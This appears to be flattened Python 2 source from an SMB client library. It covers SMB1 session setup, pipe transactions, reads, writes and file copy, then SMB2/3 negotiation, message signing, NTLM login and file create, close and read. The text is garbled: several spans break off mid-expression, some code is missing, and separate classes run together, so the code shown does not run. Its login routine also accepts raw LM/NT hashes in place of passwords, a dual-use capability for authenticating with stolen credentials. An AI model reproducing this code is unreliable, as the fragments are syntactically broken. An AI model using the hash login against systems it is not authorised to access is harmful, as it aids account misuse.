self.get_ntlmv1_response(lmhash) pwd_unicode = self.get_ntlmv1_response(nthash) elif password: lmhash = ntlm.compute_lmhash(password) nthash = ntlm.compute_nthash(password) pwd_ansi = self.get_ntlmv1_response(lmhash) pwd_unicode = self.get_ntlmv1_response(nthash) else: # NULL SESSION pwd_ansi = '' pwd_unicode = '' else: pwd_ansi = password pwd_unicode = '' smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_PATHCASELESS sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters() sessionSetup['Data'] = SMBSessionSetupAndX_Data() sessionSetup['Parameters']['MaxBuffer'] = 61440 sessionSetup['Parameters']['MaxMpxCount'] = 2 sessionSetup['Parameters']['VCNumber'] = os.getpid() sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey'] sessionSetup['Parameters']['AnsiPwdLength'] = len(pwd_ansi) sessionSetup['Parameters']['UnicodePwdLength'] = len(pwd_unicode) sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE | SMB.CAP_USE_NT_ERRORS | SMB.CAP_LARGE_READX | SMB.CAP_LARGE_WRITEX sessionSetup['Data']['AnsiPwd'] = pwd_ansi sessionSetup['Data']['UnicodePwd'] = pwd_unicode sessionSetup['Data']['Account'] = str(user) sessionSetup['Data']['PrimaryDomain'] = str(domain) sessionSetup['Data']['NativeOS'] = str(os.name) sessionSetup['Data']['NativeLanMan'] = 'pysmb' smb.addCommand(sessionSetup) self.sendSMB(smb) smb = self.recvSMB() if smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX): # We will need to use this uid field for all future requests/responses self._uid = smb['Uid'] sessionResponse = SMBCommand(smb['Data'][0]) sessionParameters = SMBSessionSetupAndXResponse_Parameters(sessionResponse['Parameters']) sessionData = SMBSessionSetupAndXResponse_Data(flags = smb['Flags2'], data = sessionResponse['Data']) self._action = sessionParameters['Action'] # Still gotta figure out how to do this with no EXTENDED_SECURITY if sessionParameters['Action'] & SMB_SETUP_USE_LANMAN_KEY == 0: self._SigningChallengeResponse = sessionSetup['Data']['UnicodePwd'] self._SigningSessionKey = nthash else: self._SigningChallengeResponse = sessionSetup['Data']['AnsiPwd'] self._SigningSessionKey = lmhash #self._SignSequenceNumber = 1 #self.checkSignSMB(smb, self._SigningSessionKey ,self._SigningChallengeResponse) #self._SignatureEnabled = True self.__server_os = sessionData['NativeOS'] self.__server_lanman = sessionData['NativeLanMan'] self.__server_domain = sessionData['PrimaryDomain'] # Set up the flags to be used from now on self.__flags1 = SMB.FLAGS1_PATHCASELESS self.__flags2 = 0 return 1 else: raise Exception('Error: Could not login successfully') def waitNamedPipe(self, tid, pipe, timeout = 5, noAnswer = 0): smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_PATHCASELESS smb['Flags2'] = SMB.FLAGS2_LONG_NAMES smb['Tid'] = tid transCommand = SMBCommand(SMB.SMB_COM_TRANSACTION) transCommand['Parameters'] = SMBTransaction_Parameters() transCommand['Data'] = SMBTransaction_Data() setup = '\x53\x00\x00\x00' name = '\\PIPE%s\x00' % pipe transCommand['Parameters']['Setup'] = setup transCommand['Parameters']['TotalParameterCount'] = 0 transCommand['Parameters']['TotalDataCount'] = 0 transCommand['Parameters']['MaxParameterCount'] = 0 transCommand['Parameters']['MaxDataCount'] = 0 transCommand['Parameters']['Timeout'] = timeout * 1000 transCommand['Parameters']['ParameterCount'] = 0 transCommand['Parameters']['ParameterOffset'] = 32+3+28+len(setup)+len(name) transCommand['Parameters']['DataCount'] = 0 transCommand['Parameters']['DataOffset'] = 0 transCommand['Data']['Name'] = name transCommand['Data']['Trans_Parameters'] = '' transCommand['Data']['Trans_Data'] = '' if noAnswer: transCommand['Parameters']['Flags'] = TRANS_NO_RESPONSE smb.addCommand(transCommand) self.sendSMB(smb) smb = self.recvSMB() if smb.isValidAnswer(SMB.SMB_COM_TRANSACTION): return 1 return 0 def read(self, tid, fid, offset=0, max_size = None, wait_answer=1): if not max_size: max_size = self._dialects_parameters['MaxBufferSize'] # Read in multiple KB blocks # max_size is not working, because although it would, the server returns an error (More data avail) smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_CANONICALIZED_PATHS | SMB.FLAGS1_PATHCASELESS smb['Flags2'] = 0 smb['Tid'] = tid read = SMBCommand(SMB.SMB_COM_READ) read['Parameters'] = SMBRead_Parameters() read['Parameters']['Fid'] = fid read['Parameters']['Offset'] = offset read['Parameters']['Count'] = max_size smb.addCommand(read) if wait_answer: answer = '' while 1: self.sendSMB(smb) ans = self.recvSMB() if ans.isValidAnswer(SMB.SMB_COM_READ): readResponse = SMBCommand(ans['Data'][0]) readParameters = SMBReadResponse_Parameters(readResponse['Parameters']) readData = SMBReadResponse_Data(readResponse['Data']) return readData['Data'] return None def read_andx(self, tid, fid, offset=0, max_size = None, wait_answer=1, smb_packet=None): if not max_size: if (self._dialects_parameters['Capabilities'] & SMB.CAP_LARGE_READX) and self._SignatureEnabled is False: max_size = 65000 else: max_size = self._dialects_parameters['MaxBufferSize'] # Read in multiple KB blocks # max_size is not working, because although it would, the server returns an error (More data avail) if smb_packet == None: smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_CANONICALIZED_PATHS | SMB.FLAGS1_PATHCASELESS smb['Flags2'] = 0 smb['Tid'] = tid readAndX = SMBCommand(SMB.SMB_COM_READ_ANDX) readAndX['Parameters'] = SMBReadAndX_Parameters() readAndX['Parameters']['Fid'] = fid readAndX['Parameters']['Offset'] = offset readAndX['Parameters']['MaxCount'] = max_size smb.addCommand(readAndX) else: smb = smb_packet if wait_answer: answer = '' while 1: self.sendSMB(smb) ans = self.recvSMB() if ans.isValidAnswer(SMB.SMB_COM_READ_ANDX): # XXX Here we are only using a few fields from the response readAndXResponse = SMBCommand(ans['Data'][0]) readAndXParameters = SMBReadAndXResponse_Parameters(readAndXResponse['Parameters']) offset = readAndXParameters['DataOffset'] count = readAndXParameters['DataCount']+0x10000*readAndXParameters['DataCount_Hi'] answer += str(ans)[offset:offset+count] if not ans.isMoreData(): return answer max_size = min(max_size, readAndXParameters['Remaining']) readAndX['Parameters']['Offset'] += count # XXX Offset is not important (apparently) else: self.sendSMB(smb) ans = self.recvSMB() try: if ans.isValidAnswer(SMB.SMB_COM_READ_ANDX): return ans else: return None except: return ans return None def read_raw(self, tid, fid, offset=0, max_size = None, wait_answer=1): if not max_size: max_size = self._dialects_parameters['MaxBufferSize'] # Read in multiple KB blocks # max_size is not working, because although it would, the server returns an error (More data avail) smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_CANONICALIZED_PATHS | SMB.FLAGS1_PATHCASELESS smb['Flags2'] = 0 smb['Tid'] = tid readRaw = SMBCommand(SMB.SMB_COM_READ_RAW) readRaw['Parameters'] = SMBReadRaw_Parameters() readRaw['Parameters']['Fid'] = fid readRaw['Parameters']['Offset'] = offset readRaw['Parameters']['MaxCount'] = max_size smb.addCommand(readRaw) self.sendSMB(smb) if wait_answer: data = self._sess.recv_packet(self.__timeout).get_trailer() if not data: # If there is no data it means there was an error data = self.read_andx(tid, fid, offset, max_size) return data return None def write(self,tid,fid,data, offset = 0, wait_answer=1): smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_CANONICALIZED_PATHS | SMB.FLAGS1_PATHCASELESS smb['Flags2'] = 0 smb['Tid'] = tid write = SMBCommand(SMB.SMB_COM_WRITE) smb.addCommand(write) write['Parameters'] = SMBWrite_Parameters() write['Data'] = SMBWrite_Data() write['Parameters']['Fid'] = fid write['Parameters']['Count'] = len(data) write['Parameters']['Offset'] = offset write['Parameters']['Remaining'] = len(data) write['Data']['Data'] = data self.sendSMB(smb) if wait_answer: smb = self.recvSMB() if smb.isValidAnswer(SMB.SMB_COM_WRITE): return smb return None def write_andx(self,tid,fid,data, offset = 0, wait_answer=1, write_pipe_mode = False, smb_packet=None): if smb_packet == None: smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_CANONICALIZED_PATHS | SMB.FLAGS1_PATHCASELESS smb['Flags2'] = 0 smb['Tid'] = tid writeAndX = SMBCommand(SMB.SMB_COM_WRITE_ANDX) smb.addCommand(writeAndX) writeAndX['Parameters'] = SMBWriteAndX_Parameters() writeAndX['Parameters']['Fid'] = fid writeAndX['Parameters']['Offset'] = offset writeAndX['Parameters']['WriteMode'] = 8 writeAndX['Parameters']['Remaining'] = len(data) writeAndX['Parameters']['DataLength'] = len(data) writeAndX['Parameters']['DataOffset'] = len(smb) # this length already includes the parameter writeAndX['Data'] = data if write_pipe_mode is True: # First of all we gotta know what the MaxBuffSize is maxBuffSize = self._dialects_parameters['MaxBufferSize'] if len(data) > maxBuffSize: chunks_size = maxBuffSize - 60 writeAndX['Parameters']['WriteMode'] = 0x0c sendData = '\xff\xff' + data totalLen = len(sendData) writeAndX['Parameters']['DataLength'] = chunks_size writeAndX['Parameters']['Remaining'] = totalLen-2 writeAndX['Data'] = sendData[:chunks_size] self.sendSMB(smb) if wait_answer: smbResp = self.recvSMB() smbResp.isValidAnswer(SMB.SMB_COM_WRITE_ANDX) alreadySent = chunks_size sendData = sendData[chunks_size:] while alreadySent < totalLen: writeAndX['Parameters']['WriteMode'] = 0x04 writeAndX['Parameters']['DataLength'] = len(sendData[:chunks_size]) writeAndX['Data'] = sendData[:chunks_size] self.sendSMB(smb) if wait_answer: smbResp = self.recvSMB() smbResp.isValidAnswer(SMB.SMB_COM_WRITE_ANDX) alreadySent += writeAndX['Parameters']['DataLength'] sendData = sendData[chunks_size:] return smbResp else: smb = smb_packet self.sendSMB(smb) if wait_answer: smb = self.recvSMB() if smb.isValidAnswer(SMB.SMB_COM_WRITE_ANDX): return smb return None def write_raw(self,tid,fid,data, offset = 0, wait_answer=1): print "[MS-CIFS] This command was introduced in the CorePlus dialect, but is often listed as part of the LAN Manager 1.0 dialect.\nThis command has been deprecated.\nClients SHOULD use SMB_COM_WRITE_ANDX" smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_CANONICALIZED_PATHS | SMB.FLAGS1_PATHCASELESS smb['Flags2'] = 0 smb['Tid'] = tid writeRaw = SMBCommand(SMB.SMB_COM_WRITE_RAW) smb.addCommand(writeRaw) writeRaw['Parameters'] = SMBWriteRaw_Parameters() writeRaw['Parameters']['Fid'] = fid writeRaw['Parameters']['Offset'] = offset writeRaw['Parameters']['Count'] = len(data) writeRaw['Parameters']['DataLength'] = 0 writeRaw['Parameters']['DataOffset'] = 0 self.sendSMB(smb) self._sess.send_packet(data) if wait_answer: smb = self.recvSMB() if smb.isValidAnswer(SMB.SMB_COM_WRITE_RAW): return smb return None def TransactNamedPipe(self, tid, fid, data = '', noAnswer = 0, waitAnswer = 1, offset = 0): self.send_trans(tid,pack('= 0: self.close(tid, fid) self.disconnect_tree(tid) def stor_file(self, service, filename, callback, mode = SMB_O_CREAT | SMB_O_TRUNC, offset = 0, password = None): filename = string.replace(filename, '/', '\\') fid = -1 tid = self.tree_connect_andx('\\\\' + self.__remote_name + '\\' + service, password) try: fid, attrib, lastwritetime, datasize, grantedaccess, filetype, devicestate, action, serverfid = self.open_andx(tid, filename, mode, SMB_ACCESS_WRITE | SMB_SHARE_DENY_WRITE) self.__nonraw_stor_file(tid, fid, offset, datasize, callback) finally: if fid >= 0: self.close(tid, fid) self.disconnect_tree(tid) def stor_file_nonraw(self, service, filename, callback, mode = SMB_O_CREAT | SMB_O_TRUNC, offset = 0, password = None): filename = string.replace(filename, '/', '\\') fid = -1 tid = self.tree_connect_andx('\\\\' + self.__remote_name + '\\' + service, password) try: fid, attrib, lastwritetime, datasize, grantedaccess, filetype, devicestate, action, serverfid = self.open_andx(tid, filename, mode, SMB_ACCESS_WRITE | SMB_SHARE_DENY_WRITE) self.__nonraw_stor_file(tid, fid, offset, datasize, callback) finally: if fid >= 0: self.close(tid, fid) self.disconnect_tree(tid) def copy(self, src_service, src_path, dest_service, dest_path, callback = None, write_mode = SMB_O_CREAT | SMB_O_TRUNC, src_password = None, dest_password = None): dest_path = string.replace(dest_path, '/', '\\') src_path = string.replace(src_path, '/', '\\') src_tid = self.tree_connect_andx('\\\\' + self.__remote_name + '\\' + src_service, src_password) dest_tid = -1 try: if src_service == dest_service: dest_tid = src_tid else: dest_tid = self.tree_connect_andx('\\\\' + self.__remote_name + '\\' + dest_service, dest_password) dest_fid = self.open_andx(dest_tid, dest_path, write_mode, SMB_ACCESS_WRITE | SMB_SHARE_DENY_WRITE)[0] src_fid, _, _, src_datasize, _, _, _, _, _ = self.open_andx(src_tid, src_path, SMB_O_OPEN, SMB_ACCESS_READ | SMB_SHARE_DENY_WRITE) if not src_datasize: src_datasize = self.query_file_info(src_tid, src_fid) if callback: callback(0, src_datasize) max_buf_size = (self._dialects_parameters['MaxBufferSize'] >> 10) << 10 read_offset = 0 write_offset = 0 while read_offset < src_datasize: self.__send_smb_packet(SMB.SMB_COM_READ_ANDX, 0, 0, src_tid, 0, pack(' -1 and src_service != dest_service: self.disconnect_tree(dest_tid) def check_dir(self, service, path, password = None): path = string.replace(path,'/', '\\') tid = self.tree_connect_andx('\\\\' + self.__remote_name + '\\' + service, password) try: self.__send_smb_packet(SMB.SMB_COM_CHECK_DIRECTORY, 0x08, 0, tid, 0, '', '\x04' + path + '\x00') while 1: s = self.recv_packet() if self.isValidAnswer(s,SMB.SMB_COM_CHECK_DIRECTORY): return finally: self.disconnect_tree(tid) def remove(self, service, path, password = None): path = string.replace(path,'/', '\\') # Perform a list to ensure the path exists self.list_path(service, path, password) tid = self.tree_connect_andx('\\\\' + self.__remote_name + '\\' + service, password) try: self.__send_smb_packet(SMB.SMB_COM_DELETE, 0x08, 0, tid, 0, pack(' -1: my_name = my_name[:i] if UDP: self._NetBIOSSession = nmb.NetBIOSUDPSession(my_name, self._Connection['ServerName'], remote_host, host_type, sess_port, self._timeout) else: self._NetBIOSSession = nmb.NetBIOSTCPSession(my_name, self._Connection['ServerName'], remote_host, host_type, sess_port, self._timeout) self.negotiateSession(preferredDialect) else: self._NetBIOSSession = session # We should increase the SequenceWindow since a packet was already received. self._Connection['SequenceWindow'] += 1 # Let's negotiate again using the same connection self.negotiateSession(preferredDialect) def printStatus(self): print "CONNECTION" for i in self._Connection.items(): print "%-40s : %s" % i print print "SESSION" for i in self._Session.items(): print "%-40s : %s" % i def getServerName(self): return self._Session['ServerName'] def getServerIP(self): return self._Connection['ServerIP'] def getServerDomain(self): return self._Session['ServerDomain'] def getServerOS(self): return self._Session['ServerOS'] def isGuestSession(self): return self._Session['SessionFlags'] & SMB2_SESSION_FLAG_IS_GUEST def setTimeout(self, timeout): self._timeout = timeout @contextmanager def useTimeout(self, timeout): prev_timeout = self.setTimeout(timeout) try: yield finally: self.setTimeout(prev_timeout) def getDialect(self): return self._Connection['Dialect'] def signSMB(self, packet): packet['Signature'] = '\x00'*16 if self._Connection['Dialect'] == SMB2_DIALECT_21 or self._Connection['Dialect'] == SMB2_DIALECT_002: if len(self._Session['SessionKey']) > 0: signature = hmac.new(self._Session['SessionKey'], str(packet), hashlib.sha256).digest() packet['Signature'] = signature[:16] else: if len(self._Session['SessionKey']) > 0: p = str(packet) signature = crypto.AES_CMAC(self._Session['SigningKey'], p, len(p)) packet['Signature'] = signature def sendSMB(self, packet): # The idea here is to receive multiple/single commands and create a compound request, and send it # Should return the MessageID for later retrieval. Implement compounded related requests. # If Connection.Dialect is equal to "3.000" and if Connection.SupportsMultiChannel or # Connection.SupportsPersistentHandles is TRUE, the client MUST set ChannelSequence in the # SMB2 header to Session.ChannelSequence # Check this is not a CANCEL request. If so, don't consume sequece numbers if packet['Command'] is not SMB2_CANCEL: packet['MessageID'] = self._Connection['SequenceWindow'] self._Connection['SequenceWindow'] += 1 packet['SessionID'] = self._Session['SessionID'] # Default the credit charge to 1 unless set by the caller if packet.fields.has_key('CreditCharge') is False: packet['CreditCharge'] = 1 # Standard credit request after negotiating protocol if self._Connection['SequenceWindow'] > 3: packet['CreditRequestResponse'] = 127 if self._Session['SigningActivated'] is True and self._Connection['SequenceWindow'] > 3: if packet['TreeID'] > 0 and self._Session['TreeConnectTable'].has_key(packet['TreeID']) is True: if self._Session['TreeConnectTable'][packet['TreeID']]['EncryptData'] is False: packet['Flags'] = SMB2_FLAGS_SIGNED self.signSMB(packet) elif packet['TreeID'] == 0: packet['Flags'] = SMB2_FLAGS_SIGNED self.signSMB(packet) self._NetBIOSSession.send_packet(str(packet)) return packet['MessageID'] def recvSMB(self, packetID = None): # First, verify we don't have the packet already if self._Connection['OutstandingResponses'].has_key(packetID): return self._Connection['OutstandingResponses'].pop(packetID) data = self._NetBIOSSession.recv_packet(self._timeout) # In all SMB dialects for a response this field is interpreted as the Status field. # This field can be set to any value. For a list of valid status codes, # see [MS-ERREF] section 2.3. packet = SMB2Packet(data.get_trailer()) # Loop while we receive pending requests if packet['Status'] == STATUS_PENDING: status = STATUS_PENDING while status == STATUS_PENDING: data = self._NetBIOSSession.recv_packet(self._timeout) packet = SMB2Packet(data.get_trailer()) status = packet['Status'] if packet['MessageID'] == packetID or packetID is None: # if self._Session['SigningRequired'] is True: # self.signSMB(packet) # Let's update the sequenceWindow based on the CreditsCharged self._Connection['SequenceWindow'] += (packet['CreditCharge'] - 1) return packet else: self._Connection['OutstandingResponses'][packet['MessageID']] = packet return self.recvSMB(packetID) def negotiateSession(self, preferredDialect = None): packet = self.SMB_PACKET() packet['Command'] = SMB2_NEGOTIATE negSession = SMB2Negotiate() negSession['SecurityMode'] = SMB2_NEGOTIATE_SIGNING_ENABLED if self.RequireMessageSigning is True: negSession['SecurityMode'] |= SMB2_NEGOTIATE_SIGNING_REQUIRED negSession['Capabilities'] = 0 negSession['ClientGuid'] = self.ClientGuid if preferredDialect is not None: negSession['Dialects'] = [preferredDialect] else: negSession['Dialects'] = [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30] negSession['DialectCount'] = len(negSession['Dialects']) packet['Data'] = negSession # Storing this data for later use self._Connection['ClientSecurityMode'] = negSession['SecurityMode'] self._Connection['Capabilities'] = negSession['Capabilities'] packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): # ToDo this: # If the DialectRevision in the SMB2 NEGOTIATE Response is 0x02FF, the client MUST issue a new # SMB2 NEGOTIATE request as described in section 3.2.4.2.2.2 with the only exception # that the client MUST allocate sequence number 1 from Connection.SequenceWindow, and MUST set # MessageId field of the SMB2 header to 1. Otherwise, the client MUST proceed as follows. negResp = SMB2Negotiate_Response(ans['Data']) self._Connection['MaxTransactSize'] = negResp['MaxTransactSize'] self._Connection['MaxReadSize'] = negResp['MaxReadSize'] self._Connection['MaxWriteSize'] = negResp['MaxWriteSize'] self._Connection['ServerGuid'] = negResp['ServerGuid'] self._Connection['GSSNegotiateToken'] = negResp['Buffer'] self._Connection['Dialect'] = negResp['DialectRevision'] if (negResp['SecurityMode'] & SMB2_NEGOTIATE_SIGNING_REQUIRED) == SMB2_NEGOTIATE_SIGNING_REQUIRED: self._Connection['RequireSigning'] = True if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LEASING) == SMB2_GLOBAL_CAP_LEASING: self._Connection['SupportsFileLeasing'] = True if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LARGE_MTU) == SMB2_GLOBAL_CAP_LARGE_MTU: self._Connection['SupportsMultiCredit'] = True if self._Connection['Dialect'] == SMB2_DIALECT_30: # Switching to the right packet format self.SMB_PACKET = SMB3Packet if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_DIRECTORY_LEASING) == SMB2_GLOBAL_CAP_DIRECTORY_LEASING: self._Connection['SupportsDirectoryLeasing'] = True if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_MULTI_CHANNEL) == SMB2_GLOBAL_CAP_MULTI_CHANNEL: self._Connection['SupportsMultiChannel'] = True if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_PERSISTENT_HANDLES) == SMB2_GLOBAL_CAP_PERSISTENT_HANDLES: self._Connection['SupportsPersistentHandles'] = True if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_ENCRYPTION) == SMB2_GLOBAL_CAP_ENCRYPTION: self._Connection['SupportsEncryption'] = True self._Connection['ServerCapabilities'] = negResp['Capabilities'] self._Connection['ServerSecurityMode'] = negResp['SecurityMode'] def login(self, user, password, domain = '', lmhash = '', nthash = ''): # If we have hashes, normalize them if ( lmhash != '' or nthash != ''): if len(lmhash) % 2: lmhash = '0%s' % lmhash if len(nthash) % 2: nthash = '0%s' % nthash try: # just in case they were converted already lmhash = a2b_hex(lmhash) nthash = a2b_hex(nthash) except: pass sessionSetup = SMB2SessionSetup() if self.RequireMessageSigning is True: sessionSetup['SecurityMode'] = SMB2_NEGOTIATE_SIGNING_REQUIRED else: sessionSetup['SecurityMode'] = SMB2_NEGOTIATE_SIGNING_ENABLED sessionSetup['Flags'] = 0 #sessionSetup['Capabilities'] = SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_DFS # Let's build a NegTokenInit with the NTLMSSP # TODO: In the future we should be able to choose different providers blob = SPNEGO_NegTokenInit() # NTLMSSP blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']] auth = ntlm.getNTLMSSPType1('',domain, self._Connection['RequireSigning']) blob['MechToken'] = str(auth) sessionSetup['SecurityBufferLength'] = len(blob) sessionSetup['Buffer'] = blob.getData() # ToDo: # If this authentication is for establishing an alternative channel for an existing Session, as specified # in section 3.2.4.1.7, the client MUST also set the following values: # The SessionId field in the SMB2 header MUST be set to the Session.SessionId for the new # channel being established. # The SMB2_SESSION_FLAG_BINDING bit MUST be set in the Flags field. # The PreviousSessionId field MUST be set to zero. packet = self.SMB_PACKET() packet['Command'] = SMB2_SESSION_SETUP packet['Data'] = sessionSetup packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_MORE_PROCESSING_REQUIRED): self._Session['SessionID'] = ans['SessionID'] self._Session['SigningRequired'] = self._Connection['RequireSigning'] self._Session['UserCredentials'] = (user, password, domain, lmhash, nthash) self._Session['Connection'] = self._NetBIOSSession.get_socket() sessionSetupResponse = SMB2SessionSetup_Response(ans['Data']) respToken = SPNEGO_NegTokenResp(sessionSetupResponse['Buffer']) # Let's parse some data and keep it to ourselves in case it is asked ntlmChallenge = ntlm.NTLMAuthChallenge(respToken['ResponseToken']) if ntlmChallenge['TargetInfoFields_len'] > 0: infoFields = ntlmChallenge['TargetInfoFields'] av_pairs = ntlm.AV_PAIRS(ntlmChallenge['TargetInfoFields'][:ntlmChallenge['TargetInfoFields_len']]) if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] is not None: try: self._Session['ServerName'] = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le') except: # For some reason, we couldn't decode Unicode here.. silently discard the operation pass if av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME] is not None: try: if self._Session['ServerName'] != av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME][1].decode('utf-16le'): self._Session['ServerDomain'] = av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME][1].decode('utf-16le') except: # For some reason, we couldn't decode Unicode here.. silently discard the operation pass # Parse Version to know the target Operating system name. Not provided elsewhere anymore if ntlmChallenge.fields.has_key('Version'): version = ntlmChallenge['Version'] self._Session['ServerOS'] = "Windows %d.%d Build %d" % (ord(version[0]), ord(version[1]), struct.unpack(' 1: treeEntry = self._Session['TreeConnectTable'][treeId] treeEntry['NumberOfUses'] -= 1 self._Session['TreeConnectTable'][treeEntry['ShareName']]['NumberOfUses'] -= 1 return True packet = self.SMB_PACKET() packet['Command'] = SMB2_TREE_DISCONNECT packet['TreeID'] = treeId treeDisconnect = SMB2TreeDisconnect() packet['Data'] = treeDisconnect packetID = self.sendSMB(packet) packet = self.recvSMB(packetID) if packet.isValidAnswer(STATUS_SUCCESS): shareName = self._Session['TreeConnectTable'][treeId]['ShareName'] del(self._Session['TreeConnectTable'][shareName]) del(self._Session['TreeConnectTable'][treeId]) return True def create(self, treeId, fileName, desiredAccess, shareMode, creationOptions, creationDisposition, fileAttributes, impersonationLevel = SMB2_IL_IMPERSONATION, securityFlags = 0, oplockLevel = SMB2_OPLOCK_LEVEL_NONE, createContexts = None): if self._Session['TreeConnectTable'].has_key(treeId) is False: raise SessionError(STATUS_INVALID_PARAMETER) fileName = string.replace(fileName, '/', '\\') if len(fileName) > 0: fileName = ntpath.normpath(fileName) if fileName[0] == '\\': fileName = fileName[1:] if self._Session['TreeConnectTable'][treeId]['IsDfsShare'] is True: pathName = fileName else: pathName = '\\\\' + self._Connection['ServerName'] + '\\' + fileName fileEntry = copy.deepcopy(FILE) fileEntry['LeaseKey'] = uuid.generate() fileEntry['LeaseState'] = SMB2_LEASE_NONE self.GlobalFileTable[pathName] = fileEntry if self._Connection['Dialect'] == SMB2_DIALECT_30 and self._Connection['SupportsDirectoryLeasing'] is True: # Is this file NOT on the root directory? if len(fileName.split('\\')) > 2: parentDir = ntpath.dirname(pathName) if self.GlobalFileTable.has_key(parentDir): print "Don't know what to do now! :-o" raise else: parentEntry = copy.deepcopy(FILE) parentEntry['LeaseKey'] = uuid.generate() parentEntry['LeaseState'] = SMB2_LEASE_NONE self.GlobalFileTable[parentDir] = parentEntry packet = self.SMB_PACKET() packet['Command'] = SMB2_CREATE packet['TreeID'] = treeId if self._Session['TreeConnectTable'][treeId]['IsDfsShare'] is True: packet['Flags'] = SMB2_FLAGS_DFS_OPERATIONS smb2Create = SMB2Create() smb2Create['SecurityFlags'] = 0 smb2Create['RequestedOplockLevel'] = oplockLevel smb2Create['ImpersonationLevel'] = impersonationLevel smb2Create['DesiredAccess'] = desiredAccess smb2Create['FileAttributes'] = fileAttributes smb2Create['ShareAccess'] = shareMode smb2Create['CreateDisposition'] = creationDisposition smb2Create['CreateOptions'] = creationOptions smb2Create['NameLength'] = len(fileName)*2 if fileName != '': smb2Create['Buffer'] = fileName.encode('utf-16le') else: smb2Create['Buffer'] = '\x00' if createContexts is not None: smb2Create['Buffer'] += createContexts else: smb2Create['CreateContextsOffset'] = 0 smb2Create['CreateContextsLength'] = 0 packet['Data'] = smb2Create packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): createResponse = SMB2Create_Response(ans['Data']) openFile = copy.deepcopy(OPEN) openFile['FileID'] = createResponse['FileID'] openFile['TreeConnect'] = treeId openFile['Oplocklevel'] = oplockLevel openFile['Durable'] = False openFile['ResilientHandle'] = False openFile['LastDisconnectTime'] = 0 openFile['FileName'] = pathName # ToDo: Complete the OperationBuckets if self._Connection['Dialect'] == SMB2_DIALECT_30: openFile['DesiredAccess'] = oplockLevel openFile['ShareMode'] = oplockLevel openFile['CreateOptions'] = oplockLevel openFile['FileAttributes'] = oplockLevel openFile['CreateDisposition'] = oplockLevel # ToDo: Process the contexts self._Session['OpenTable'][str(createResponse['FileID'])] = openFile # The client MUST generate a handle for the Open, and it MUST # return success and the generated handle to the calling application. # In our case, str(FileID) return str(createResponse['FileID']) def close(self, treeId, fileId): if self._Session['TreeConnectTable'].has_key(treeId) is False: raise SessionError(STATUS_INVALID_PARAMETER) if self._Session['OpenTable'].has_key(fileId) is False: raise SessionError(STATUS_INVALID_PARAMETER) packet = self.SMB_PACKET() packet['Command'] = SMB2_CLOSE packet['TreeID'] = treeId smbClose = SMB2Close() smbClose['Flags'] = 0 smbClose['FileID'] = fileId packet['Data'] = smbClose packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): del(self.GlobalFileTable[self._Session['OpenTable'][fileId]['FileName']]) del(self._Session['OpenTable'][fileId]) # ToDo Remove stuff from GlobalFileTable return True def read(self, treeId, fileId, offset = 0, bytesToRead = 0, waitAnswer = True): # IMPORTANT NOTE: As you can see, this was coded as a recursive function # Hence, you can exhaust the memory pretty easy ( large bytesToRead ) # This function should NOT be used for reading files directly, but another higher # level function should be used that will break the read into smaller pieces if self._Session['TreeConnectTable'].has_key(treeId) is False: raise SessionError(STATUS_INVALID_PARAMETER) if self._Session['OpenTable'].has_key(fileId) is False: raise SessionError(STATUS_INVALID_PARAMETER) packet = self.SMB_PACKET() packet['Command'] = SMB2_READ packet['TreeID'] = treeId if self._Connection['MaxReadSize'] < bytesToRead: maxBytesToRead = self._Connection['MaxReadSize'] else: maxBytesToRead = bytesToRead if self._Connection['Dialect'] != SMB2_DIALECT_002 and self._Connection['SupportsMultiCredit'] is True: packet['CreditCharge'] = ( 1 + (maxBytesToRead - 1) / 65536) else: maxBytesToRead = min(65536,bytesToRead) smbRead = SMB2Read() smbRead['Padding'] = 0x50 smbRead['FileID'] = fileId smbRead['Length'] = maxBytesToRead smbRead['Offset'] = offset packet['Data'] = smbRead packetID = self.sendSMB(packet) ans = self.recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): readResponse = SMB2Read_Response(ans['Data']) retData = readResponse['Buffer'] if readResponse['DataRemaining'] > 0: retData += self.read(treeId, fileId, offset+len(retData), readResponse['DataRemaining'], waitAnswer) return retData def write(self, treeId, fileId, data, offset = 0, bytesToWrite = 0, waitAnswer = True): # IMPORTANT NOTE: As you can see, this was coded as a recursive function # Hence, you can exhaust the memory pretty easy ( large bytesToWrite ) # This function should NOT be used for writing directly to files, but another higher # level function should be used that will break the writes into smaller pieces if self._Session['TreeConnectTable'].has_key(treeId) is False: raise SessionError(STATUS_INVALID_PARAMETER) if self._Session['OpenTable'].has_key(fileId) is False: raise 